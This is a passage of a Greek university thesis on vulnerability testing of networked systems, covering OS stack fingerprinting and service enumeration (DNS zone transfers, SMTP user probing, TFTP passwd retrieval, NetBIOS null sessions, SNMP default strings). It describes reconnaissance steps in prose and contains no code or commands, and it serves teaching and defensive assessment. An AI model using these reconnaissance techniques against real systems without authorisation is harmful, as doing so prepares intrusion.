Ενεργητική Αναγνώριση Στοίβας

Η αναγνώριση στοίβας (stack fingerprinting) είναι μια εξαιρετικά ισχυρή τεχνολογία η οποία

δίνει τη δυνατότητα να εξακριβωθεί η ταυτότητα του λειτουργικού συστήματος

οποιουδήποτε υπολογιστή, με μεγάλο βαθμό βεβαιότητας40

40 Scambray J.- McClure S. – Kurtz G., σελ 69 – 70, 2009

. Εξαιτίας των διαφοροποιήσεων

στην υλοποίηση στοίβας των πρωτοκόλλων TCP/IP μεταξύ των κατασκευαστών, ο

επιτιθέμενος μπορεί να συμπεράνει με αρκετά μεγάλη ακρίβεια το λειτουργικό σύστημα που

Page 61: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

61 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

χρησιμοποιεί ένας υπολογιστής. Η τεχνική αυτή για να έχει μέγιστη αξιοπιστία απαιτεί την

ύπαρξη μίας τουλάχιστον ενεργής θύρας.

Οι τύποι των ελέγχων που μπορούν να εκτελεστούν με στόχο τη διάκριση ενός λειτουργικού

συστήματος από ένα άλλο είναι οι ακόλουθοι41

• FIN: Σε μια ανοιχτή θύρα στέλνεται ένα πακέτο FIN. Το RFC 793 καθορίζει ότι η σωστή

συμπεριφορά είναι να μην αποσταλεί καμία απόκριση. Ωστόσο, πολλά λειτουργικά (όπως

Windows NT/200X/Vista) ανταποκρίνονται με FIN/ACK.

:

• Ανύπαρκτη σήμανση (Bogus flag probe): Στην κεφαλίδα (header) ενός TCP πακέτου

SYN ενεργοποιείται μια μη καθοριζόμενη σήμανση. Ορισμένα λειτουργικά συστήματα,

όπως το Linux, αποκρίνονται με ένα πακέτο με την ίδια σήμανση.

• Αρχικός αριθμός ακολουθίας (Initial Sequence Number-ISN sampling): Ο βασικός

στόχος εδώ είναι η εύρεση ενός μοτίβου στην αρχική ακολουθία που επιλέγεται από την

υλοποίηση του TCP κατά την απόκριση σε μια αίτηση σύνδεσης.

• “Don’t fragment bit” monitoring: Ορισμένα λειτουργικά συστήματα θέτουν το «Don’t

fragment bit» (ψηφίο μη κατακερματισμού) σε 1, για τη βελτιστοποίηση της απόδοσης.

Αυτό το κομμάτι μπορεί να ελεγχθεί για να καθορίσει ποιοι τύποι λειτουργικών

συστημάτων έχουν αυτήν την συμπεριφορά.

• Αρχικό μέγεθος παραθύρου TCP: Παρακολουθείται το αρχικό μέγεθος παραθύρου

(initial window size) των επιστρεφόμενων πακέτων. Σε ορισμένες υλοποιήσεις στοίβας

αυτό το μέγεθος είναι μοναδικό, αυξάνοντας σημαντικά την ακρίβεια του μηχανισμού

αναγνώρισης στοίβας.

• Τιμή ACK: Διαφορετικές υλοποιήσεις στοίβας ΙΡ χρησιμοποιούν διαφορετικές τιμές

ακολουθίας για το πεδίο ACK. Ορισμένα συστήματα επιστρέφουν τον αριθμό

ακολουθίας που στέλνεται, ενώ άλλα συστήματα στέλνουν τον αριθμό ακολουθίας +1.

• Καταστολή ICMP μηνυμάτων σφάλματος: Ορισμένα λειτουργικά συστήματα

ακολουθούν το RFC 1812 (http://www.ietf.org/rfc/rfc1812.txt) και περιορίζουν τον

ρυθμό αποστολής μηνυμάτων σφάλματος. Στέλνοντας UDP σε κάποια τυχαία

επιλεγμένη, ανώτερη θύρα, μπορεί να μετρηθεί το πλήθος των μηνυμάτων “unreachable”

που λαμβάνονται στη μονάδα του χρόνου. Αυτό είναι επίσης χρήσιμο για τον

προσδιορισμό των ανοιχτών UDP θυρών.

• Πληροφορίες ICMP μηνυμάτων: Τα λειτουργικά συστήματα διαφέρουν στο ποσό των

πληροφοριών που αναφέρουν όταν αντιμετωπίζουν ICMP σφάλματα. Εξετάζοντας αυτά

41 Scambray J.- McClure S. – Kurtz G., σελ 70 – 71, 2009

Page 62: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

62 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

τα μηνύματα ο επιτιθέμενος μπορεί να κάνει ορισμένες υποθέσεις για την ταυτότητα του

λειτουργικού συστήματος.

• ICMP μηνύματα σφάλματος – ακεραιότητα επιστρεφόμενων μηνυμάτων: Ορισμένα

λειτουργικά συστήματα διαφοροποιούν τα πεδία κεφαλίδας ΙΡ (IP header) όταν

επιστρέφουν ICMP μηνύματα σφάλματος. Εξετάζοντας τις διαφοροποιήσεις των

κεφαλίδων είναι δυνατόν να συναχθεί η ταυτότητα του λειτουργικού συστήματος.

• Τύπος υπηρεσίας (Type of Service-TOS): Εξετάζεται ο τύπος υπηρεσίας για τα

μηνύματα “ICMP port unreachable”. Τα περισσότερα λειτουργικά χρησιμοποιούν τον

τύπο 0, αλλά όχι όλα.

• Χειρισμός κατακερματισμένων πακέτων: Διαφορετικά λειτουργικά συστήματα

χειρίζονται με διαφορετικό τρόπο τα αλληλοκαλυπτόμενα τμήματα πακέτων. Ορισμένα

αντικαθιστούν τα παλαιά δεδομένα με τα νέα και το αντίστροφο κατά την

επανασυναρμολόγηση. Η εξέταση του τρόπου επανασυναρμολόγησης των τμημάτων των

πακέτων μπορεί να οδηγήσει σε ορισμένες υποθέσεις για το λειτουργικό σύστημα που

χρησιμοποιεί το σύστημα στόχος.

• Επιλογές TCP: Οι επιλογές του TCP καθορίζονται στο RFC 793 και, πιο πρόσφατα στο

RFC 1323 (http://www.ietf.org/rfc/rfc1323.txt). Οι πιο προχωρημένες επιλογές που

καθορίζονται στο RFC 1323 υλοποιούνται συνήθως στα πιο πρόσφατα λειτουργικά

συστήματα. Στέλνοντας ένα πακέτο με πολλαπλές επιλογές, - όπως καμία λειτουργία,

μέγιστο μέγεθος τμήματος, παράγοντας κλίμακας παραθύρου, και timestamps - είναι

δυνατόν να γίνουν υποθέσεις για την ταυτότητα του λειτουργικού συστήματος.

Οι τεχνικές οι οποίες αναφέρθηκαν προηγουμένως καταφέρνουν να εντοπίσουν με ακρίβεια

το λειτουργικό σύστημα που τρέχει στο οργανισμό-στόχο. Έχουν όμως ένα μειονέκτημα.

Στηρίζονται στην αποστολή πακέτων στο σύστημα-στόχο και ένα βασιζόμενο στο δίκτυο

σύστημα εντοπισμού εισβολών είναι σχετικά εύκολο να ανιχνεύσει αυτές τις

δραστηριότητες.

Παθητική Αναγνώριση Στοίβας

Η παθητική αναγνώριση στοίβας έχει παρόμοιες βασικές αρχές με την ενεργητική

αναγνώριση σωρού. Με αυτή την τεχνική, ο εισβολέας, αντί να στέλνει πακέτα στο

σύστημα-στόχο, παρακολουθεί παθητικά την κυκλοφορία του δικτύου για να εξακριβώσει

την ταυτότητα του λειτουργικού συστήματος. Ωστόσο, για να είναι αποτελεσματική αυτή η

τεχνική η παρακολούθηση θα πρέπει να γίνεται σε μια κεντρική θέση του δικτύου και σε μια

θύρα η οποία να επιτρέπει τη συλλογή πακέτων (π.χ. σε ένα mirrored port).

Page 63: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

63 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Η παθητική αναγνώριση στοίβας βασίζεται στην ανάλυση υπογραφών των πακέτων τα

οποία κυκλοφορούν σε ένα δίκτυο. Υπάρχουν διάφορες υπογραφές οι οποίες μπορούν να

χρησιμοποιηθούν για την αναγνώριση ενός λειτουργικού συστήματος, θα περιορίσουμε

όμως τη συζήτησή μας μόνο σε ορισμένα χαρακτηριστικά μιας TCP/IP συνόδου:

• TTL: Ποια είναι η τιμή time-to-live των εξερχόμενων πακέτων

• Μέγεθος παραθύρου: Ποιο είναι το μέγεθος παραθύρου

• DF: Εάν είναι ενεργοποιημένο το Don’t Fragment bit

Ο εισβολέας αναλύοντας παθητικά κάθε ένα από αυτά τα χαρακτηριστικά και συγκρίνοντας

τα αποτελέσματα με μια βάση δεδομένων γνωστών χαρακτηριστικών, μπορεί να

διαπιστώσει την ταυτότητα του λειτουργικού συστήματος.

Η μετάβαση απλά και μόνο στην τοποθεσία web του στόχου, η χρήση ενό ς εργαλείου

συλλογής πακέτων, όπως το Snort, και η σύγκριση των αποτελεσμάτων με μια βάση

δεδομένων, είναι αρκετά για τον εντοπισμό του λειτουργικού συστήματος.

Η παθητική αναγνώριση στοίβας δεν είναι απόλυτα αξιόπιστη. Μπορεί όμως να βοηθήσει

στην εξαγωγή συμπερασμάτων για το λειτουργικό σύστημα του συστήματος-στόχου αν

ληφθούν υπόψη οι ακόλουθοι περιορισμοί:

• Οι εφαρμογές οι οποίες δημιουργούν τα δικά τους πακέτα (π.χ. Nmap) δεν

χρησιμοποιούν τις ίδιες υπογραφές με το λειτουργικό σύστημα

• Ένα απομακρυσμένο σύστημα μπορεί εύκολα να αλλάξει τα χαρακτηριστικά των

συνδέσεών του

• Να είναι εφικτή η συλλογή των πακέτων

2.4.3 Ενεργητική Συλλογή Πληροφοριών ή Απαρίθμηση Συστήματος (Enumeration)

Εφόσον ο εισβολέας εντοπίσει ποίες υπηρεσίες είναι ενεργές στο σύστημα – στόχο, το

επόμενο που έχει να κάνει είναι να τις εξετάσει σχολαστικά με σκοπό να εντοπίσει γνωστά

αδύναμα σημεία τους. Η διαδικασία αυτή είναι γνωστή ως ενεργητική συλλογή

πληροφοριών ή απαρίθμηση συστήματος (Enumeration). Η τεχνική αυτή διαφέρει από τις

προηγούμενες ως προς το επίπεδο διείσδυσης, αφού στην απαρίθμηση συστήματος απαιτεί

την ενεργή σύνδεση στο σύστημα στόχο, γεγονός το οποίο δύναται να γίνει αντιληπτό.

Οι τεχνικές ενεργητικής συλλογής πληροφοριών βασίζονται στις πληροφορίες που

συλλέχθηκαν προηγουμένως, κατά την σάρωση θυρών, και κυρίως στην έκδοση του

Page 64: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

64 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

λειτουργικού συστήματος που εκτελείται στο σύστημα στόχο. Στη συνέχεια θα δούμε

μερικές από τις τεχνικές απαρίθμησης συστήματος.

ΕΝΕΡΓΗΤΙΚΗ ΣΥΛΛΟΓΗ ΠΛΗΡΟΦΟΡΙΩΝ

Οι περισσότερες τεχνικές απαρίθμησης συστήματος ασχολούνται με τη συλλογή προτροπών

και μηνυμάτων (banner grabbing). Είναι η διαδικασία σύνδεσης σε εφαρμογές οι οποίες

εκτελούνται σε απομακρυσμένα συστήματα και η παρατήρηση της εξόδου που παράγουν.

Από την παρατήρηση της εξόδου οι εισβολείς μπορούν να προσδιορίσουν το είδος της

υπηρεσίας που εκτελείται, το οποίο συχνά, είναι αρκετό για την έναρξη μιας διαδικασίας

αναζήτησης τρωτών σημείων.

Ένα από τα εργαλεία που χρησιμοποιούν οι εισβολείς για τη συλλογή πληροφοριών από

μηνύματα και προτροπές εφαρμογών είναι το telnet το οποίο βρίσκεται ενσωματωμένο στα

περισσότερα λειτουργικά συστήματα. Από τη στιγμή που ένας εισβολέας εντοπίσει τον

κατασκευαστή και την έκδοση του λογισμικού που εκτελείται σε έναν εξυπηρετητή, μπορεί

να επικεντρωθεί σε τεχνικές και γνωστά τρωτά σημεία του συγκεκριμένου λογισμικού μέχρι

να καταφέρει να διεισδύσει στο σύστημα.

ΑΠΑΡΙΘΜΗΣΗ ΚΟΙΝΩΝ ΥΠΗΡΕΣΙΩΝ ΤΟΥ ΔΙΚΤΥΟΥ

Στη συνέχεια θα δούμε ορισμένες από τις κοινές υπηρεσίες που τρέχουν σε ένα δίκτυο, οι

οποίες εντοπίζονται από τα εργαλεία σάρωσης θυρών και χρησιμοποιούνται σε τεχνικές

απαρίθμησης.

• Απαρίθμηση μέσω FTP, TCP-21

Παρόλο που το πρωτόκολλο File Transfer Protocol (FTP) δεν χρησιμοποιείται πλέον

συχνά στο internet, η σύνδεση και η εξέταση των περιεχομένων του εξακολουθεί να

αποτελεί μια απλή και αποτελεσματική τεχνική απαρίθμησης. Η χρήση του για τον

εύκολο διαμοιρασμό αρχείων, συχνά εκθέτει ευαίσθητες πληροφορίες για τον οργανισμό-

στόχο, πολύ δε περισσότερο, όταν είναι διαμορφωμένο για ανώνυμη προσπέλαση. Η

συλλογή μηνυμάτων FTP δείχνει στον εισβολέα την ύπαρξη λογισμικού διακομιστή FTP

με διάφορες ευπάθειες τις οποίες μπορεί να εκμεταλλευτεί.

• Απαρίθμηση telnet, TCP 23

Το telnet, το οποίο έχει αντικατασταθεί πλέον από άλλες περισσότερο ασφαλείς

υπηρεσίες απομακρυσμένης πρόσβασης, όταν εντοπιστεί σε ένα σύστημα στόχο παρέχει

στον εισβολέα πολύτιμες πληροφορίες λόγο του τρόπου λειτουργίας του. Η βασικότερη

ευπάθεια του είναι ότι διαβιβάζει δεδομένα σε clear-text. Αυτό σημαίνει ότι με ένα

Page 65: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

65 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

εργαλείο παρακολούθησης των δικτυακών πακέτων (εφεξής sniffer) ο επιτιθέμενος

μπορεί να δει ολόκληρη την επικοινωνία ανάμεσα στον κόμβο και το εξυπηρετητή,

συμπεριλαμβανομένων των ονομάτων χρηστών και των συνθηματικών.

- Απαρίθμηση συστημάτων μέσω Telnet Banners. Το telnet συχνά εμφανίζει ένα

banner συστήματος πριν τη σύνδεση, το οποίο περιέχει πληροφορίες για το

λειτουργικό σύστημα και την έκδοση του κόμβου.

- Απαρίθμηση λογαριασμών χρηστών μέσω Telnet. Είναι η διαδικασία προσπάθειας

σύνδεσης σε έναν εξυπηρετητή με τη χρήση ενός συγκεκριμένου ονόματος χρήστη

και η μελέτη των μηνυμάτων λάθους που επιστρέφει το σύστημα. Με τη συλλογή των

απαντήσεων από τον εξυπηρετητή, για κάθε όνο μα χρήστη πο υ δο κιμάζει ο

επιτιθέμενος, μπορεί να δημιουργήσει μια λίστα έγκυρων λογαριασμών χρηστών. • Απαρίθμηση μέσω SMTP, TCP 25

Μια κλασσική μέθοδος απαρίθμησης εκμεταλλεύεται το πρωτόκολλο μεταφοράς

μηνυμάτων ηλεκτρονικού ταχυδρομείου το SMTP (Simple Mail Transfer Protocol) το

οποίο τρέχει στην θύρα TCP 25. Το SMTP έχει δύο εγγενείς εντολές οι οποίες

επιτρέπουν τη συλλογή πληροφοριών για τους χρήστες: την VDFX η οποία επιβεβαιώνει

τα ονόματα των έγκυρων χρηστών, και την EXPN η οποία αποκαλύπτει την πραγματική

διεύθυνση παράδοσης για ψευδώνυμα (aliases) και λίστες ηλεκτρονικού ταχυδρομείου. Η

ενεργοποίηση αυτής της δραστηριότητας στον εξυπηρετητή του ηλεκτρονικού

ταχυδρομείου επιτρέπει στον επιτιθέμενο να παραποιήσει τα μηνύματα που

αποστέλλονται και λαμβάνονται και το κυριότερο μπορεί να τους παρέχει τα ονόματα

των τοπικών λογαριασμών χρηστών στον εξυπηρετητή.

• Απαρίθμηση μέσω DNS/TCP/UDP 53

Όπως είδαμε κατά την αναγνώριση το υ συστήματο ς μια από τις βασικές πηγές λήψης

πληροφοριών είναι το DNS (Domain Name System), το πρωτόκολλο του internet το

οποίο αναλαμβάνει να κάνει την αντιστοίχηση των IP διευθύνσεων των συστημάτων σε

κατανοητά για τον άνθρωπο ονόματα. Το DNS συνήθως λειτουργεί σε UDP στη θύρα 53,

αλλά μπορεί να εκτελείται και σε TCP στη θύρα 53 για εκτεταμένα χαρακτηριστικά όπως

η μεταφορά ζώνης.

− Απαρίθμηση DNS με μεταφορά ζώνης, είναι μια από τις παλαιότερες τεχνικές

απαρίθμησης η οποία εκτελείται εναντίον εξυπηρετητών DNS με προβληματική

διαμόρφωση μέσω της θύρας TCP 53. Η τεχνική αυτή μεταφέρει όλα τα περιεχόμενα

των αρχείων ζώνης ενός συγκεκριμένου domain, βρίσκοντας έτσι πληροφορίες όπως

οι αντιστοιχίσεις ονομάτων σε διευθύνσεις IP, καθώς και δεδομένων hinfo (Host

Page 66: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

66 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Information Record). Εάν ο εξυπηρετητής-στόχος τρέχει υπηρεσίες Microsoft DNS

για την υποστήριξη του Active Directory (AD), είναι πολύ πιθανό ένας εισβολέας να

μπορέσει να συγκεντρώσει ακόμα περισσότερες πληροφορίες. Επειδή ο χώρος

ονομάτων (name space) του AD βασίζεται στο DNS, η οποία επιτρέπει τον εντοπισμό

εξυπηρετητών βάσει τύπου υπηρεσίας (π.χ. LDAP, FTP ή www) και πρωτοκόλλου

(π.χ. TCP). Συνεπώς, μια απλή μεταφορά ζώνης μπορεί να αποφέρει πολλές

ενδιαφέρουσες πληροφορίες για ένα δίκτυο, όπως η θέση της υπηρεσίας Global

Catalog του domain, οι domain controllers οι οποίοι χρησιμοποιούν πιστοποίηση

Kerberos, οι LDAP Servers και οι σχετιζόμενοι αριθμοί θυρών.

− Απαρίθμηση BIND: Ο Berkeley Internet Name Domain (BIND) server είναι ένας

δημοφιλής εξυπηρετητής DNS στις διάφορες παραλλαγές του Unix. Εκτός από την

τρωτότητα της μεταφοράς ζώνης DNS, το BIND διαθέτει μια εγγραφή την version

bind, η οποία περιέχει την έκδοση της εγκατάστασης BIND στον εξυπηρετητή-στόχο.

− DNS Cache αναζήτηση: οι DNS servers διατηρούν μια cache για διάφορους λόγους.

Ένας από αυτούς είναι η γρήγορη απόκριση σε συχνά χρησιμοποιούμενα ονόματα

κόμβων. Ο επιτιθέμενος μπορεί να εκμεταλλευτεί αυτή τη λειτουργία του

εξυπηρετητή DNS και να εξάγει συμπεράσματα για το αν ένας πελάτης του DNS

server έχει επισκεφτεί ή όχι μια συγκεκριμένη ιστοσελίδα.

− Αυτόματη Απαρίθμηση DNS: Υπάρχουν πολλά εργαλεία που αυτοματοποιούν τις

τεχνικές απαρίθμησης και παρέχουν επιπλέον πληροφορίες για ένα Domain και τους

κόμβους του.

• Απαρίθμηση TFTP, TCP/UDP 69

Ένας δημοφιλής τρόπος υποκλοπής του αρχείου passwd των συστημάτων UNIX/LINUX

είναι μέσω του πρωτοκόλλου TFTP (Trivial File Transfer Protocol), το οποίο τρέχει

συνήθως στη θύρα UDP 69. Ο εισβολέας μπορεί εύκολα να αποκτήσει το αρχείο αυτό

και να αποκρυπτογραφήσει τους κωδικούς πρόσβασης, καθώς και να διαβάσει τα

ονόματα χρηστών απευθείας από το αρχείο. Επίσης, επειδή πολλές δικτυακές συσκευές

όπως δρομολογητές (routers) και μεταγωγείς (switches) διαμορφώνονται ως TFTP server

μπορούν να παρέχουν το αρχείο διαμόρφωσης τους στον επιτιθέμενο.

• Απαρίθμηση μέσω HTTP, TCP 80

Η τεχνική αυτή χρησιμοποιείται για τη συλλογή banner του πρωτοκόλλου HTTP. Σκοπό

έχει τη συλλογή πληροφοριών από τον πηγαίο κώδικα HTML και κυρίως τον εντοπισμό

συνθηματικών από αυτόν.

Page 67: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

67 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Απαρίθμηση μέσω του Microsoft RPC Endpoint Mapper (MSRPC), TCP 135

Κάποια συστήματα με τα Microsoft Windows τρέχουν μια υπηρεσία αντιστοίχισης

αιτήσεων από client προγράμματα σε θύρες (port mapper) μέσω του πρωτοκόλλου RPC

(Remote Procedure Call) στη θύρα TCP 135. Η διερεύνηση αυτής της υπηρεσίας μπορεί

να αποφέρει πληροφορίες για τις εφαρμογές και υπηρεσίες που είναι διαθέσιμες στο

σύστημα-στόχο, καθώς και άλλες πληροφορίες, ενδεχομένως χρήσιμες για τον εισβολέα

π.χ. μπορεί να εντοπίσει τη διεπαφή (interface) επικοινωνίας με το εσωτερικό δίκτυο.

• Απαρίθμηση μέσω της υπηρεσίας ονομάτων του NetBios, UDP 137

Η υπηρεσία ονομάτων του NetBios (NetBios Name Service, NBNS) χρησιμοποιείται,

κατά παράδοση, σαν ένα κατανεμημένο σύστημα ονομάτων για δίκτυα βασιζόμενα στα

λειτουργικά συστήματα της οικογένειας Windows. Αν και μετά τα Windows 2000 η

υπηρεσία NBNS δεν είναι αναγκαία, αφού έχει αντικατασταθεί από το DNS, συνεχίζει να

είναι εξ’ αρχής ενεργοποιημένη σε όλες τις εκδόσεις των Windows. Συνεπώς, είναι

γενικά εύκολο για τους εισβολείς που καταφέρνουν να συνδεθούν στον τοπικό κλάδο του

δικτύου (ή μέσω ενός router ο οποίος επιτρέπει την διέλευση (tunneling) της υπηρεσίας

NBNS πάνω από το TPC/IP), να εκτελέσουν απαρίθμηση βασιζόμενη στην υπηρεσία

NBNS. Τα εργαλεία και οι τεχνικές για την εξερεύνηση δικτύων με το NetBIOS είναι

άμεσα διαθέσιμα, αφού τα περισσότερα είναι ενσωματωμένα στο ίδιο το λειτουργικό

σύστημα. Οι τεχνικές απαρίθμησης μέσω NBNS αναζητούν συνήθως αυτή την υπηρεσία

σε όλους τους σταθμούς του δικτύου και συχνά είναι τόσο «διαφανείς» που δύσκολα

δείχνουν ότι κάποιος συνδέεται σε μια συγκεκριμένη υπηρεσία στη θύρα UDP 137. Οι

πληροφορίες που μπορούν να συλλεχθούν είναι:

− Εμφάνιση των domains, ομάδων εργασίας (workgroups) των Windows και σταθμών

εργασίας.

− Προσδιορίζονται οι ελεγκτές domain, τα μέλη domain και η ταυτότητα των εφεδρικών

ελεγκτών domain.

− Εμφάνιση μιας λίστας με τους εξυπηρετητές στους οποίους εκτελούνται

συγκεκριμένες υπηρεσίες

− Εμφάνιση του πίνακα ονομάτων του NetBIOS από ένα απομακρυσμένο σύστημα.

• Απαρίθμηση μέσω συνόδων του NetBIOS, TCP 139/445

Μια άλλη τεχνική που χρησιμοποιούν οι εισβολείς προκειμένου να συλλέξουν

πληροφορίες για το στόχο τους είναι οι επιθέσεις κενής συνόδου / ανώνυμης σύνδεσης.

Με αυτό τον τρόπο μπορούν να συλλέξουν πληροφορίες για το δίκτυο, τους

κοινόχρηστους πόρους, τους χρήστες, τις ομάδες, τα κλειδιά της registry κ.α.

Page 68: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

68 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Με τη χρήση των κατάλληλων εργαλείων μπορούν να πραγματοποιήσουν:

− Απαρίθμηση Κοινόχρηστων Αρχείων: Στόχο των εισβολέων αποτελούν οι

κοινόχρηστοι πόροι αρχείων των Windows που δεν έχουν συμπεριληφθεί στις λίστες

ελέγχου πρόσβασης. Οι πληροφορίες που συλλέγουν σχετίζονται με τους

κοινόχρηστους πόρους, τους εξουσιοδοτημένους χρήστες, καθώς και τους κρυφούς

κοινόχρηστους πόρους.

− Απαρίθμηση Registry: η εξέταση των περιεχομένων του Registry του συστήματος-

στόχου παρέχουν πληροφορίες σχετικά με τους χρήστες και τη διαμόρφωση του

συστήματος.

− Απαρίθμηση έμπιστων Domain: η υλοποίηση μιας ανώνυμης σύνδεσης με ένα από

τα συστήματα του domain που εξετάζει ο εισβολέας μπορεί να παρέχει πληροφορίες

για πρόσθετα domains τα οποία σχετίζονται με το αρχικό.

− Απαρίθμηση χρηστών: παρέχει στους εισβολείς λίστες χρηστών και ομάδων, καθώς

και τις πολιτικές του συστήματος και τα δικαιώματα των χρηστών.

− Άλλες πληροφορίες: με τη χρήση διαφόρων εργαλείων οι εισβολείς μπορούν,

επιπλέον, μέσω μιας κενής συνόδου να συλλέξουν πληροφορίες για τις MAC

διευθύνσεις και τα ονόματα των συσκευών των καρτών δικτύου απομακρυσμένων

συστημάτων, για λογαριασμούς χρηστών, κοινόχρηστων πόρων και έμπιστους

λογαριασμούς μεταξύ domain, εξυπηρετητών και σταθμών εργασίας.

• Απαρίθμηση μέσω SNMP, UDP 161

Το πρωτόκολλο SNMP (Simple Network Management Protocol) είναι σχεδιασμένο ώστε

να παρέχει πληροφορίες για τις συσκευές του δικτύου, του λογισμικού και τα συστήματα,

γι’ αυτό και αποτελεί στόχο των εισβολέων. Τα δεδομένα του SNMP προστατεύονται

από ένα απλό σύστημα πιστοποίησης βασιζόμενο σε όνομα χρήστη και συνθηματικό, τα

οποία είναι προκαθορισμένα και ευρέως γνωστά. Επιπλέον, πολλοί κατασκευαστές

υλοποιούν τις δικές τους επεκτάσεις στο βασικό σύνολο πληροφοριών του SNMP οι

οποίες μπορούν να περιέχουν συγκεκριμένες πληροφορίες για τον εκάστοτε

κατασκευαστή. Συνεπώς, εάν από τη σάρωση θυρών προ κύψει ό τι εκτελείται μια

υπηρεσία SNMP οι εισβολείς δεν θα δυσκολευτούν να μαντέψουν τον κωδικό και να

αποσπάσουν πληροφορίες για τις συσκευές του δικτύου, το λογισμικό και τα συστήματα

ή να αλλάξουν τις παραμέτρους, με σκοπό την παραβίαση της ασφάλειας του

συστήματος ή της πρόκλησης μιας επίθεσης άρνησης εξυπηρέτησης.

Page 69: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

69 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Απαρίθμηση BGP, TCP 179

Το BGP (Border Gateway Protocol) είναι ένα πρωτόκολλο δρομολόγησης στο internet

και χρησιμοποιείται από τους δρομολογητές (routers) για την μετάδοση των

πληροφοριών που απαιτούνται για την δρομολόγηση των πακέτων IP στους προορισμούς

τους. Ο εισβολέας, εξετάζοντας τους πίνακες δρομολόγησης του BGP, μπορεί να

εντοπίσει τα δίκτυα που σχετίζονται με τον συγκεκριμένο οργανισμό και να τα προσθέσει

στη λίστα των στόχων του.

